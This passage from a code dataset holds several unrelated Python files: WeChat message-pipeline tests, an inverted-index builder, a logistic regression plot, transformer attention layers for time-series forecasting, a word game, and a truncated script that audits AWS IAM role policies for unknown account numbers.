'../../')\r\n\tsys.path.insert(0, '../')\r\n\r\nfrom weixin.handler.handler_testutil import *\r\ninit_handler_test_env()\r\n\r\nimport unittest\r\n\r\nfrom handler.weixin_message import parse_weixin_message_from_xml\r\nfrom handler.message_handler import *\r\n\r\nfrom message_pipeline import *\r\n\r\nfrom django.http import HttpRequest\r\n\r\nfrom watchdog.utils import *\r\n\r\nclass DummyHandlerWithoudProcessing(MessageHandler):\r\n\r\n\tdef handle(self, context, is_from_simulator=False):\r\n\t\treturn None\r\n\r\nclass DummyHandlerWithDummyProcessing(MessageHandler):\r\n\r\n\tdef handle(self, context, is_from_simulator=False):\r\n\t\tmessage = context.message\r\n\t\treturn message.msgId\r\n\r\nclass DummyHandlerThrowException(MessageHandler):\r\n\r\n\tdef handle(self, context, is_from_simulator=False):\r\n\t\traise ValueError('i am told to be')\r\n\r\nclass DummyNonMessageHandler():\r\n\tpass\r\n\r\n\r\nclass DummyPreProcessingHandler(object):\r\n\tdef pre_processing(self, context, is_from_simulator=False):\r\n\t\tif context.request.GET.has_key('pre_process_count'):\r\n\t\t\tcontext.request.GET['pre_process_count'] = context.request.GET['pre_process_count'] + 1\r\n\t\telse:\r\n\t\t\tcontext.request.GET['pre_process_count'] = 1\r\n\r\nclass DummyPreProcessingHandlerWithException(object):\r\n\tdef pre_processing(self, context, is_from_simulator=False):\r\n\t\traise ValueError('i am told to be')\r\n\r\nclass DummyPostProcessingHandler(object):\r\n\tdef post_processing(self, context, handler, response, is_from_simulator=False):\r\n\t\tif context.request.GET.has_key('post_process_count'):\r\n\t\t\tcontext.request.GET['post_process_count'] = context.request.GET['post_process_count'] + 1\r\n\t\telse:\r\n\t\t\tcontext.request.GET['post_process_count'] = 1\r\n\r\nclass DummyPostProcessingHandlerWithException(object):\r\n\tdef post_processing(self, context, handler, response, is_from_simulator=False):\r\n\t\traise ValueError('i am told to be')\r\n\r\nDUMMY_MESSAGE = \"\"\"\r\n\t\r\n\t\r\n\t \r\n\t1348831860\r\n\t\r\n\t\r\n\t1234567890123456\r\n\t\r\n\t\"\"\"\r\n\r\ndef build_test_request():\r\n\tdummy_request = HttpRequest()\r\n\tdummy_request.user = getTestUserProfile().user\r\n\r\n\tdummy_request.GET = {}\r\n\tdummy_request._body = DUMMY_MESSAGE\r\n\treturn dummy_request\r\n\r\n\r\nclass MessagePipelineTest(unittest.TestCase):\r\n\r\n\tdef testCreatePipelineWithInvalidParams(self):\r\n\t\ttry:\r\n\t\t\tpipeline = MessagePipeline([])\r\n\t\t\tself.fail()\r\n\t\texcept ValueError: #due to empty handler claeeses\r\n\t\t\tself.assertTrue(True)\r\n\r\n\t\ttry:\r\n\t\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyNonMessageHandler'])\r\n\t\t\tself.fail()\r\n\t\texcept ValueError:\r\n\t\t\tself.assertTrue(True)\r\n\r\n\tdef testMessageHandling(self):\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyNonMessageHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithoudProcessing',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing'])\r\n\r\n\t\tdummy_request = build_test_request()\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tmessage = parse_weixin_message_from_xml(DUMMY_MESSAGE)\r\n\t\tself.assertEqual(message.msgId, response)\r\n\t\t\r\n\tdef testMessageHandlingWithPreAndPostProcessing(self):\r\n\t\tMessage.objects.all().delete()\r\n\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyNonMessageHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithoudProcessing',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPreProcessingHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPreProcessingHandlerWithException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPreProcessingHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPostProcessingHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPostProcessingHandlerWithException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPostProcessingHandler',\r\n\t\t\t\t])\r\n\t\t\r\n\t\tdummy_request = build_test_request()\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tmessage = parse_weixin_message_from_xml(DUMMY_MESSAGE)\r\n\t\tself.assertEqual(message.msgId, response)\r\n\r\n\t\t#两个handler都分别进行了预处理和后处理\r\n\t\tself.assertEqual(2, dummy_request.GET['pre_process_count'])\r\n\t\tself.assertEqual(2, dummy_request.GET['post_process_count'])\r\n\r\n\t\t#且在进行预处理和后处理期间发生两次异常\r\n\t\tself.assertEqual(2, Message.objects.all().count())\r\n\t\tfor message in Message.objects.all():\r\n\t\t\tself.assertTrue(message.message.find('i am told to be') > 0)\r\n\r\n\tdef testMessageHandlingWithException(self):\r\n\t\tMessage.objects.all().delete()\r\n\r\n\t\t#在某一个handler处理发生异常后中断处理\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyHandlerThrowException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing'])\r\n\r\n\t\t\r\n\t\tdummy_request = build_test_request()\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tself.assertEqual(None, response)\r\n\t\tself.assertEqual(1, Message.objects.all().count())\r\n\t\tself.assertEqual('WEB', Message.objects.all()[0].type)\r\n\t\tself.assertEqual(WATCHDOG_WEB, Message.objects.all()[0].severity)\r\n\r\n\t\t#如果设置在某一个handler处理发生异常后继续后续handler的处理\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyHandlerThrowException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing'], False)\r\n\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tmessage = parse_weixin_message_from_xml(DUMMY_MESSAGE)\r\n\t\tself.assertEqual(message.msgId, response)\r\n\r\nif __name__ == '__main__':\r\n\tstart_test_withdb()","repo_name":"chengdg/weizoom","sub_path":"weapp/weixin/message/message_pipeline_tests.py","file_name":"message_pipeline_tests.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71034128872","text":"import sys\nimport os\nimport json\n\n# Returns the Token from tokenStream entry\ndef getToken(tokenEntry):\n return tokenEntry[0]\n\n\n# Returns the DocID from tokenStream entry\ndef getDocID(tokenEntry):\n return int(tokenEntry[1])\n\n\n# Deletes the previously created blocks from the directory\ndef cleanDirectory(path):\n fileList = os.listdir(path)\n\n for f in fileList:\n if os.path.isfile(os.path.join(path, f)):\n os.remove(os.path.join(path, f))\n\n print(\"Directory cleaned.\")\n\n\n# Writes a block on disk (mini inverted index)\ndef write_dict_to_file(fileBaseName, fileIndex, block_dictionary):\n fileName = fileBaseName + str(fileIndex) + '.txt'\n dirName = os.path.dirname(fileName)\n\n if not os.path.exists(dirName):\n os.makedirs(dirName)\n\n with open(fileName, 'w') as blockFile:\n blockFile.write(json.dumps(block_dictionary, indent=2, sort_keys=True))\n\n print(\"Block dictionary successfully saved to '\" + fileName + \"' file.\")\n\n\n# Processes the tokenStream and generates the inverted index\ndef SPIMI_Invert(tokenStream, fileBaseName):\n fileIndex = 0\n blockSizeLimit = 1 # Max size of block in MB\n block_dictionary = {}\n\n for tokenEntry in tokenStream:\n if (sys.getsizeof(block_dictionary)/1024/1024) >= blockSizeLimit:\n write_dict_to_file(fileBaseName, fileIndex, block_dictionary)\n fileIndex += 1\n block_dictionary = {}\n\n\n tokenEntry_Token = getToken(tokenEntry)\n tokenEntry_DocID = getDocID(tokenEntry)\n\n if tokenEntry_Token in block_dictionary:\n\n if tokenEntry_DocID in block_dictionary[tokenEntry_Token]['docs'].keys():\n block_dictionary[tokenEntry_Token]['docs'][tokenEntry_DocID]['tf'] += 1\n\n else:\n block_dictionary[tokenEntry_Token]['df'] += 1\n block_dictionary[tokenEntry_Token]['docs'][tokenEntry_DocID] = {'tf': 1}\n\n else:\n block_dictionary[tokenEntry_Token] = {'df': 1, 'docs': {tokenEntry_DocID: {'tf': 1}}}\n\n # creates the last block\n write_dict_to_file(fileBaseName, fileIndex, block_dictionary)\n\n\n# Writes the final inverted index on disk\ndef write_full_SPIMI_to_file(SPIMI_directory, full_SPIMI_dictionary):\n fileName = SPIMI_directory + 'SPIMI_dictionary.txt'\n # fileName = SPIMI_directory + 'Unfiltered_SPIMI/unfiltered_SPIMI_dictionary.txt' # Uncomment to get unfiltered tokenStream\n dirName = os.path.dirname(fileName)\n\n if not os.path.exists(dirName):\n os.makedirs(dirName)\n\n with open(fileName, 'w') as blockFile:\n blockFile.write(json.dumps(full_SPIMI_dictionary, indent=2, sort_keys=True))\n\n print(\"SPIMI dictionary successfully saved to '\" + fileName + \"' file.\")\n\n\n# Merges all the blocks (mini inverted indexes) into one inverted index\ndef merge_SPIMI(SPIMI_directory, blockBaseName):\n fileList = [ f for f in os.listdir(SPIMI_directory) if f.startswith(blockBaseName) ]\n fileList = sorted(fileList)\n\n full_SPIMI_dictionary = {}\n\n for fname in fileList:\n blockFile_name = SPIMI_directory + fname\n\n with open(blockFile_name, 'r') as blockFile:\n file_content = blockFile.read()\n blockFile_dictionary = json.loads(file_content)\n\n for blockTerm, blockTerm_data in blockFile_dictionary.items():\n if blockTerm in full_SPIMI_dictionary:\n full_SPIMI_dictionary[blockTerm]['df'] += blockTerm_data['df']\n full_SPIMI_dictionary[blockTerm]['docs'].update(blockTerm_data['docs'])\n else:\n full_SPIMI_dictionary[blockTerm] = {'df': blockTerm_data['df'], 'docs': blockTerm_data['docs']}\n\n write_full_SPIMI_to_file(SPIMI_directory, full_SPIMI_dictionary)\n\n\n\n\n# Execution starts here\nts_file = 'Tokenization/tokenStream.txt'\n# ts_file = 'Tokenization/unfiltered_tokenStream.txt' # Uncomment to get unfiltered tokenStream\n\nif os.path.isfile(ts_file):\n with open(ts_file, 'r') as tokenStream_file:\n file_content = tokenStream_file.read()\n tokenStream = json.loads(file_content)\n\n SPIMI_directory = 'SPIMI/'\n blockBaseName = 'spimi_block_'\n fileBaseName = SPIMI_directory + blockBaseName\n\n # Deletes all the previous files in the directory\n cleanDirectory(SPIMI_directory)\n\n SPIMI_Invert(tokenStream, fileBaseName)\n merge_SPIMI(SPIMI_directory, blockBaseName)\n\nelse:\n print(\"The tokenStream file was not found. Please run the 'Tokenizer.py' file first.\")\n","repo_name":"andavazgar/IR_SentimentRanking","sub_path":"SPIMI.py","file_name":"SPIMI.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33136274636","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom logistic_regression_model import LogisticRegressionUsingGD\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\ndef load_data(path, header):\r\n marks_df = pd.read_csv(path, header=header)\r\n return marks_df\r\n\r\n\r\nif __name__ == \"__main__\":\r\n data = pd.read_csv(\"data/marks.txt\")\r\n\r\n X = data.iloc[:, :-1]\r\n y = data.iloc[:, -1]\r\n admitted = data.loc[y == 1]\r\n not_admitted = data.loc[y == 0]\r\n\r\n plt.scatter(admitted.iloc[:, 0], admitted.iloc[:, 1], s=10, label='Admitted')\r\n plt.scatter(not_admitted.iloc[:, 0], not_admitted.iloc[:, 1], s=10,\r\n label='Not Admitted')\r\n\r\n\r\n X = np.c_[np.ones((X.shape[0], 1)), X]\r\n y = y[:, np.newaxis]\r\n theta = np.zeros((X.shape[1], 1))\r\n\r\n\r\n model = LogisticRegressionUsingGD()\r\n model.fit(X, y, theta)\r\n accuracy = model.accuracy(X, y.flatten())\r\n parameters = model.w_\r\n \r\n\r\n x_values = [np.min(X[:, 1] - 2), np.max(X[:, 2] + 2)]\r\n y_values = - (parameters[0] + np.dot(parameters[1], x_values)) / parameters[2]\r\n\r\n plt.plot(x_values, y_values, label='Decision Boundary')\r\n plt.xlabel('Marks in 1st Exam')\r\n plt.ylabel('Marks in 2nd Exam')\r\n plt.legend()\r\n plt.show()\r\n","repo_name":"pavels-k/My-algorithms","sub_path":"Machine_learning/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43696630905","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom math import sqrt\nfrom datasets.advanced_loader import TriangularCausalMask, ProbMask\nfrom reformer_pytorch import LSHSelfAttention\nfrom einops import rearrange, repeat\n\n\"\"\"\nThis class contains several variations of the self attention used in transformer\nSome are only less computationally expensive, others have additional changes specifically for time series forecasting\nEach variation is based on a different paper\n\nAutocorrelation inspired from https://github.com/thuml/Autoformer\n@Author MeelsL\n\"\"\"\nclass DSAttention(nn.Module):\n \"\"\"Stationairy Attention used in Autoformer\"\"\"\n\n def __init__(self, mask_flag=True, factor=5, scale=None, attention_dropout=0.1, output_attention=False):\n \"\"\"\n :param mask_flag:\n :param factor:\n :param scale:\n :param attention_dropout:\n :param output_attention:\n \"\"\"\n super(DSAttention, self).__init__()\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n B, L, H, E = queries.shape\n _, S, _, D = values.shape\n scale = self.scale or 1. / sqrt(E)\n\n tau = 1.0 if tau is None else tau.unsqueeze(\n 1).unsqueeze(1) # B x 1 x 1 x 1\n delta = 0.0 if delta is None else delta.unsqueeze(\n 1).unsqueeze(1) # B x 1 x 1 x S\n\n # De-stationary Attention, rescaling pre-softmax score with learned de-stationary factors\n scores = torch.einsum(\"blhe,bshe->bhls\", queries, keys) * tau + delta\n\n if self.mask_flag:\n if attn_mask is None:\n attn_mask = TriangularCausalMask(B, L, device=queries.device)\n\n scores.masked_fill_(attn_mask.mask, -np.inf)\n\n A = self.dropout(torch.softmax(scale * scores, dim=-1))\n V = torch.einsum(\"bhls,bshd->blhd\", A, values)\n\n if self.output_attention:\n return (V.contiguous(), A)\n else:\n return (V.contiguous(), None)\n\n\nclass FullAttention(nn.Module):\n \"\"\"\n Standard attention mechanism\n \"\"\"\n def __init__(self, mask_flag=True, factor=5, scale=None, attention_dropout=0.1, output_attention=False):\n super(FullAttention, self).__init__()\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n \"\"\"\n Self attention mechanism\n \"\"\"\n B, L, H, E = queries.shape\n _, S, _, D = values.shape\n scale = self.scale or 1. / sqrt(E)\n\n #einsum for easier computation\n scores = torch.einsum(\"blhe,bshe->bhls\", queries, keys)\n\n if self.mask_flag:\n if attn_mask is None:\n attn_mask = TriangularCausalMask(B, L, device=queries.device)\n scores.masked_fill_(attn_mask.mask, -np.inf)\n else:\n scores = scores.masked_fill(attn_mask == 1, -np.inf)\n\n A = self.dropout(torch.softmax(scale * scores, dim=-1))\n V = torch.einsum(\"bhls,bshd->blhd\", A, values)\n\n if self.output_attention:\n return (V.contiguous(), A)\n else:\n return (V.contiguous(), None)\n\n\nclass ProbAttention(nn.Module):\n \"\"\"\n Probability attention (used for informer architecture)\n \"\"\"\n def __init__(self, mask_flag=True, factor=5, scale=None, attention_dropout=0.1, output_attention=False):\n super(ProbAttention, self).__init__()\n self.factor = factor\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def _prob_QK(self, Q, K, sample_k, n_top):\n \"\"\"\n Compute attention score on subset only\n :param Q: Query vector\n :param K: key vector\n :param sample_k: sample rate\n :param n_top: max size of subset\n :return: computation\n \"\"\"\n B, H, L_K, E = K.shape\n _, _, L_Q, _ = Q.shape\n\n # calculate sample K\n K_expand = K.unsqueeze(-3).expand(B, H, L_Q, L_K, E)\n index_sample = torch.randint(L_K, (L_Q, sample_k))\n K_sample = K_expand[:, :, torch.arange(\n L_Q).unsqueeze(1), index_sample, :]\n Q_K_sample = torch.matmul(\n Q.unsqueeze(-2), K_sample.transpose(-2, -1)).squeeze()\n\n # find the top m using sparsity measurement\n M = Q_K_sample.max(-1)[0] - torch.div(Q_K_sample.sum(-1), L_K)\n M_top = M.topk(n_top, sorted=False)[1]\n\n #compute Q reduced for attention score\n Q_reduce = Q[torch.arange(B)[:, None, None],\n torch.arange(H)[None, :, None],\n M_top, :] # factor*ln(L_q)\n #compute attention with Q reduce\n Q_K = torch.matmul(Q_reduce, K.transpose(-2, -1)) # factor*ln(L_q)*L_k\n\n return Q_K, M_top\n\n def _get_initial_context(self, V, L_Q):\n B, H, L_V, D = V.shape\n if not self.mask_flag:\n # V_sum = V.sum(dim=-2)\n V_sum = V.mean(dim=-2)\n contex = V_sum.unsqueeze(-2).expand(B, H,\n L_Q, V_sum.shape[-1]).clone()\n else: # use a mask (diagonally masked attention)\n contex = V.cumsum(dim=-2)\n return contex\n\n def _update_context(self, context_in, V, scores, index, L_Q, attn_mask):\n \"\"\"\n updates context vector\n :param context_in: context in vector\n :param V: Value vector\n :param scores: current scores\n :param index: indices applied to score\n :param L_Q: lower query matrix\n :param attn_mask: attention mask\n :return: updated context vector\n \"\"\"\n B, H, L_V, D = V.shape\n\n if self.mask_flag:\n if attn_mask is None:\n attn_mask = ProbMask(B, H, L_Q, index, scores, device=V.device)\n scores.masked_fill_(attn_mask.mask, -np.inf)\n else:\n attn_mask = ProbMask(B, H, L_Q, index, scores, device=V.device, attn_mask=attn_mask)\n scores = scores.masked_fill(attn_mask.mask == 1, -np.inf)\n\n\n\n attn = torch.softmax(scores, dim=-1) # nn.Softmax(dim=-1)(scores)\n\n context_in[torch.arange(B)[:, None, None],\n torch.arange(H)[None, :, None],\n index, :] = torch.matmul(attn, V).type_as(context_in)\n if self.output_attention:\n attns = (torch.ones([B, H, L_V, L_V]) /\n L_V).type_as(attn).to(attn.device)\n attns[torch.arange(B)[:, None, None], torch.arange(H)[\n None, :, None], index, :] = attn\n return (context_in, attns)\n else:\n return (context_in, None)\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n B, L_Q, H, D = queries.shape\n _, L_K, _, _ = keys.shape\n\n queries = queries.transpose(2, 1)\n keys = keys.transpose(2, 1)\n values = values.transpose(2, 1)\n\n U_part = self.factor * \\\n np.ceil(np.log(L_K)).astype('int').item()\n u = self.factor * \\\n np.ceil(np.log(L_Q)).astype('int').item()\n\n U_part = U_part if U_part < L_K else L_K\n u = u if u < L_Q else L_Q\n\n scores_top, index = self._prob_QK(\n queries, keys, sample_k=U_part, n_top=u)\n\n scale = self.scale or 1. / sqrt(D)\n if scale is not None:\n scores_top = scores_top * scale\n\n context = self._get_initial_context(values, L_Q)\n\n #update context\n context, attn = self._update_context(\n context, values, scores_top, index, L_Q, attn_mask)\n\n return context.contiguous(), attn\n\n\nclass AttentionLayer(nn.Module):\n \"\"\"\n Standard attention layer (part of full attention)\n \"\"\"\n def __init__(self, attention, d_model, n_heads, d_keys=None,\n d_values=None):\n super(AttentionLayer, self).__init__()\n\n d_keys = d_keys or (d_model // n_heads)\n d_values = d_values or (d_model // n_heads)\n\n self.inner_attention = attention\n self.query_projection = nn.Linear(d_model, d_keys * n_heads)\n self.key_projection = nn.Linear(d_model, d_keys * n_heads)\n self.value_projection = nn.Linear(d_model, d_values * n_heads)\n self.out_projection = nn.Linear(d_values * n_heads, d_model)\n self.n_heads = n_heads\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n B, L, _ = queries.shape\n _, S, _ = keys.shape\n H = self.n_heads\n\n queries = self.query_projection(queries).view(B, L, H, -1)\n keys = self.key_projection(keys).view(B, S, H, -1)\n values = self.value_projection(values).view(B, S, H, -1)\n\n out, attn = self.inner_attention(\n queries,\n keys,\n values,\n attn_mask,\n tau=tau,\n delta=delta\n )\n out = out.view(B, L, -1)\n\n return self.out_projection(out), attn\n\n\n\n\n\nclass AutoCorrelation(nn.Module):\n \"\"\"\n Autocorrelation block used for AutoFormer architecture\n \"\"\"\n\n def __init__(self, mask_flag=True, factor=1, scale=None, attention_dropout=0.1, output_attention=False):\n super(AutoCorrelation, self).__init__()\n self.factor = factor\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def time_delay_agg_training(self, values, corr):\n \"\"\"\n Computes time delay aggregation\n \"\"\"\n\n head = values.shape[1]\n channel = values.shape[2]\n length = values.shape[3]\n\n top_k = int(self.factor * math.log(length))\n mean_value = torch.mean(torch.mean(corr, dim=1), dim=1)\n index = torch.topk(torch.mean(mean_value, dim=0), top_k, dim=-1)[1]\n weights = torch.stack([mean_value[:, index[i]] for i in range(top_k)], dim=-1)\n\n tmp_corr = torch.softmax(weights, dim=-1)\n\n tmp_values = values\n delays_agg = torch.zeros_like(values).float()\n for i in range(top_k):\n pattern = torch.roll(tmp_values, -int(index[i]), -1)\n delays_agg = delays_agg + pattern * \\\n (tmp_corr[:, i].unsqueeze(1).unsqueeze(1).unsqueeze(1).repeat(1, head, channel, length))\n return delays_agg\n\n def time_delay_agg_inference(self, values, corr):\n \"\"\"\n SpeedUp version of Autocorrelation (a batch-normalization style design)\n This is for the inference phase.\n \"\"\"\n\n batch = values.shape[0]\n head = values.shape[1]\n channel = values.shape[2]\n length = values.shape[3]\n\n\n init_index = torch.arange(length).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(batch, head, channel, 1).cuda()\n\n top_k = int(self.factor * math.log(length))\n mean_value = torch.mean(torch.mean(corr, dim=1), dim=1)\n weights, delay = torch.topk(mean_value, top_k, dim=-1)\n\n tmp_corr = torch.softmax(weights, dim=-1)\n\n tmp_values = values.repeat(1, 1, 1, 2)\n delays_agg = torch.zeros_like(values).float()\n for i in range(top_k):\n tmp_delay = init_index + delay[:, i].unsqueeze(1).unsqueeze(1).unsqueeze(1).repeat(1, head, channel, length)\n pattern = torch.gather(tmp_values, dim=-1, index=tmp_delay)\n delays_agg = delays_agg + pattern * \\\n (tmp_corr[:, i].unsqueeze(1).unsqueeze(1).unsqueeze(1).repeat(1, head, channel, length))\n return delays_agg\n\n def time_delay_agg_full(self, values, corr):\n \"\"\"\n Standard auto correlation (full time delay slower)\n \"\"\"\n batch = values.shape[0]\n head = values.shape[1]\n channel = values.shape[2]\n length = values.shape[3]\n\n init_index = torch.arange(length).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(batch, head, channel, 1).cuda()\n\n top_k = int(self.factor * math.log(length))\n weights, delay = torch.topk(corr, top_k, dim=-1)\n\n tmp_corr = torch.softmax(weights, dim=-1)\n\n tmp_values = values.repeat(1, 1, 1, 2)\n delays_agg = torch.zeros_like(values).float()\n for i in range(top_k):\n tmp_delay = init_index + delay[..., i].unsqueeze(-1)\n pattern = torch.gather(tmp_values, dim=-1, index=tmp_delay)\n delays_agg = delays_agg + pattern * (tmp_corr[..., i].unsqueeze(-1))\n return delays_agg\n\n def forward(self, queries, keys, values, attn_mask):\n \"\"\"\n model train forward\n \"\"\"\n B, L, H, E = queries.shape\n _, S, _, D = values.shape\n if L > S:\n zeros = torch.zeros_like(queries[:, :(L - S), :]).float()\n values = torch.cat([values, zeros], dim=1)\n keys = torch.cat([keys, zeros], dim=1)\n else:\n values = values[:, :L, :, :]\n keys = keys[:, :L, :, :]\n\n #perform fast fourier transform\n q_fft = torch.fft.rfft(queries.permute(0, 2, 3, 1).contiguous(), dim=-1)\n k_fft = torch.fft.rfft(keys.permute(0, 2, 3, 1).contiguous(), dim=-1)\n res = q_fft * torch.conj(k_fft)\n corr = torch.fft.irfft(res, dim=-1)\n\n # time delay aggregation\n if self.training:\n V = self.time_delay_agg_training(values.permute(0, 2, 3, 1).contiguous(), corr).permute(0, 3, 1, 2)\n else:\n V = self.time_delay_agg_inference(values.permute(0, 2, 3, 1).contiguous(), corr).permute(0, 3, 1, 2)\n\n #compute correlation\n if self.output_attention:\n return (V.contiguous(), corr.permute(0, 3, 1, 2))\n else:\n return (V.contiguous(), None)\n\n\nclass AutoCorrelationLayer(nn.Module):\n \"\"\"\n Autocorrelation layers (part of the AutoCorrelation block)\n \"\"\"\n def __init__(self, correlation, d_model, n_heads, d_keys=None,\n d_values=None):\n super(AutoCorrelationLayer, self).__init__()\n\n d_keys = d_keys or (d_model // n_heads)\n d_values = d_values or (d_model // n_heads)\n\n self.inner_correlation = correlation\n self.query_projection = nn.Linear(d_model, d_keys * n_heads)\n self.key_projection = nn.Linear(d_model, d_keys * n_heads)\n self.value_projection = nn.Linear(d_model, d_values * n_heads)\n self.out_projection = nn.Linear(d_values * n_heads, d_model)\n self.n_heads = n_heads\n\n def forward(self, queries, keys, values, attn_mask):\n B, L, _ = queries.shape\n _, S, _ = keys.shape\n H = self.n_heads\n\n\n #compute query, key and values)\n queries = self.query_projection(queries).view(B, L, H, -1)\n keys = self.key_projection(keys).view(B, S, H, -1)\n values = self.value_projection(values).view(B, S, H, -1)\n\n out, attn = self.inner_correlation(\n queries,\n keys,\n values,\n attn_mask\n )\n out = out.view(B, L, -1)\n\n return self.out_projection(out), attn\n\n\n","repo_name":"Meelzak/TimeSeries-Transformer","sub_path":"forecasting/models/layers/SelfAttention_Family.py","file_name":"SelfAttention_Family.py","file_ext":"py","file_size_in_byte":15358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32008255324","text":"# complete word : \r\nprint('hi , this is a completing word game : complete the ap_ _ e word ')\r\ne= str(input('guess first chracter of this word : '))\r\nl = str(input('guess next chracter of this word : '))\r\npo= 0 # point \r\na='ap', e ,l , 'e'\r\nif e== 'p' and l== 'l' :\r\n po+=1 \r\n print('win ', po)\r\nelif e== 'p' or l== 'l' :\r\n \r\n print('not far from win , try another time : ')\r\nelse : \r\n print('you lose : ')\r\n \r\n","repo_name":"minhaz72/short_project_in_python","sub_path":"short_project/word_complete.py","file_name":"word_complete.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33005809640","text":"import json\nimport re\nimport time\n\nimport boto3\nimport mypy_boto3_iam\n\ntotal_roles = 0\ntotal_policies = 0\naccount_numbers_found = set()\naccount_numbers_allowed = {'736815776541', '831269439992', '349546234265', '944132310209', '972874111695',\n '301497165819'} # known customer accounts\niam_client = boto3.client('iam') # type mypy_boto3_iam.client\naccount_pattern = re.compile('([0-9]{12})')\naccount_pattern_arn = re.compile('arn.*:([0-9]{12}):')\n\n\ndef main():\n print('Listing allowed account numbers')\n with open('../../europace/aws-sso/globals.tf') as file:\n file_content = (file.read())\n allowed_accounts_definition = file_content\n\n global account_numbers_allowed\n account_numbers_allowed = account_numbers_allowed | set(account_pattern.findall(allowed_accounts_definition))\n\n print('Getting initial iam roles')\n roles = iam_client.list_roles()\n\n iterate_roles_with_policies(roles)\n marker: str = roles['Marker']\n\n while marker != 'null':\n roles = iam_client.list_roles(Marker=marker)\n\n if 'Marker' in roles:\n marker = roles['Marker']\n else:\n marker = 'null'\n\n iterate_roles_with_policies(roles)\n\n print(f'Checked {total_roles} roles')\n print(f'Checked {total_policies} policies')\n print(f'Allowed account numbers: {account_numbers_allowed}')\n print(f'Found account numbers: {account_numbers_found}')\n print(f'Suspicious account numbers: {account_numbers_found - account_numbers_allowed}')\n\n\ndef iterate_roles_with_policies(roles):\n global total_roles\n total_roles += len(roles['Roles'])\n total_loop_roles = len(roles['Roles'])\n current_loop_roles = 0\n\n for role in roles['Roles']:\n current_loop_roles += 1\n role_name = role['RoleName']\n global total_policies\n\n print(f'\\n{role_name}:')\n\n marker = None\n while marker != 'null':\n\n inline_policies: dict\n if marker is None:\n inline_policies = iam_client.list_role_policies(RoleName=role_name)\n else:\n inline_policies = iam_client.list_role_policies(RoleName=role_name, Marker=marker)\n\n if 'Marker' in inline_policies:\n marker = inline_policies['Marker']\n else:\n marker = 'null'\n\n total_policies += len(inline_policies['PolicyNames'])\n\n for inline_policy_name in inline_policies['PolicyNames']:\n print(f'[inline] {inline_policy_name}')\n get_and_check_policy(role_name=role_name, policy_name=inline_policy_name, retries=0, is_named=False)\n\n marker = None\n while marker != 'null':\n\n named_policies: dict\n if marker is None:\n named_policies = iam_client.list_attached_role_policies(RoleName=role_name)\n else:\n named_policies = iam_client.list_attached_role_policies(RoleName=role_name)\n\n if 'Marker' in named_policies:\n marker = named_policies['Marker']\n else:\n marker = 'null'\n\n total_policies += len(named_policies['AttachedPolicies'])\n\n for named_policy in named_policies['AttachedPolicies']:\n print('[attached] {0}'.format(named_policy['PolicyName']))\n get_and_check_policy(policy_arn=named_policy['PolicyArn'], retries=0, is_named=True)\n\n if current_loop_roles % 10 != 0:\n print(f'Checked {total_loop_roles}/{total_loop_roles} roles')\n\n\ndef get_and_check_policy(retries: int, is_named: bool, role_name='', policy_name='', policy_arn=''):\n if retries == 0:\n pass\n else:\n sleep_seconds = 2 ** retries * 100 / 1000\n print(f'Waiting for {sleep_seconds}s')\n time.sleep(sleep_seconds)\n\n # noinspection PyBroadException\n try:\n if is_named:\n if 